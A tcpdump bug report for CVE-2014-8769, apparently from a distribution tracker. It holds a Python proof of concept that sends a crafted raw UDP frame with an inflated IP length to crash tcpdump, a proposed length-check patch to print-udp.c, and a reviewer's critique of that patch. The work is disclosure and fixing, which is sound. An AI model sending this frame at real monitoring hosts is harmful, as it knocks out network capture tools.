Package: tcpdump
Version: 4.6.2
tags: Security

Using the following script to generate the packet:

#!/usr/bin/env python
# Proof of concept from the report: write a single raw Ethernet frame to the
# loopback interface so that a tcpdump listening on lo dissects it.
from socket import socket, AF_PACKET, SOCK_RAW

s = socket(AF_PACKET, SOCK_RAW)   # raw link-layer socket (requires CAP_NET_RAW / root)
s.bind(("lo", 0))

# Ethernet + IPv4 + UDP frame; the IP header advertises a total length far larger
# than the bytes actually sent. The b"" prefix keeps it a byte string on both
# Python 2 and Python 3.
aovd_frame = b"\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"

s.send(aovd_frame)

# Listener used to reproduce the crash, started in another terminal before sending:
#sudo tcpdump -i lo -s 0 -n -v
This causes a segfault in tcpdump. This bug is reported as CVE-2014-8769.
The proposed patch is in the attached file. The main idea is to check the length of
available data before printing it on screen.

The credit belongs to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de

Original report in bugtraq:
http://seclists.org/bugtraq/2014/Nov/88

CongNT


--- tcpdump-tcpdump-4.6/print-udp.c	2014-11-21 13:53:05.757690197 +0700
+++ tcpdump-4.6.2/print-udp.c	2014-11-21 13:50:58.077695164 +0700
@@ -357,6 +357,12 @@
 #ifdef INET6
 	register const struct ip6_hdr *ip6;
 #endif
+	u_int caplength;
+
+	/* Checking length of available data before print */
+	caplength = (ndo->ndo_snapend >= bp) ? ndo->ndo_snapend - bp : 0;
+	if (length > caplength)
+		length = caplength;
 
 	if (ep > ndo->ndo_snapend)
 		ep = ndo->ndo_snapend;
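Review bot: overwriting `length` with the captured length at the top of the function conflates the on-the-wire length with what was captured; the rest of udp_print compares `length` against the length field in the UDP header, so a legitimate packet captured with a short snaplen will now be reported as malformed rather than as truncated. A bounds check (TCHECK-style) in the dissector that actually reads past the buffer for the crafted packet in the report keeps the two cases distinct and also protects callers other than udp_print. If the clamp stays here, note that the existing `if (ep > ndo->ndo_snapend) ep = ndo->ndo_snapend;` right below already bounds the end pointer, so (assuming `ep` is initialised as `bp + length`) `length = ep - bp;` after that clamp gives the same result without the separate `caplength` computation. Minor: the `---`/`+++` headers name different top-level directories (tcpdump-tcpdump-4.6 vs tcpdump-4.6.2); `patch -p1` still applies, but the diff reads as a comparison of two different trees.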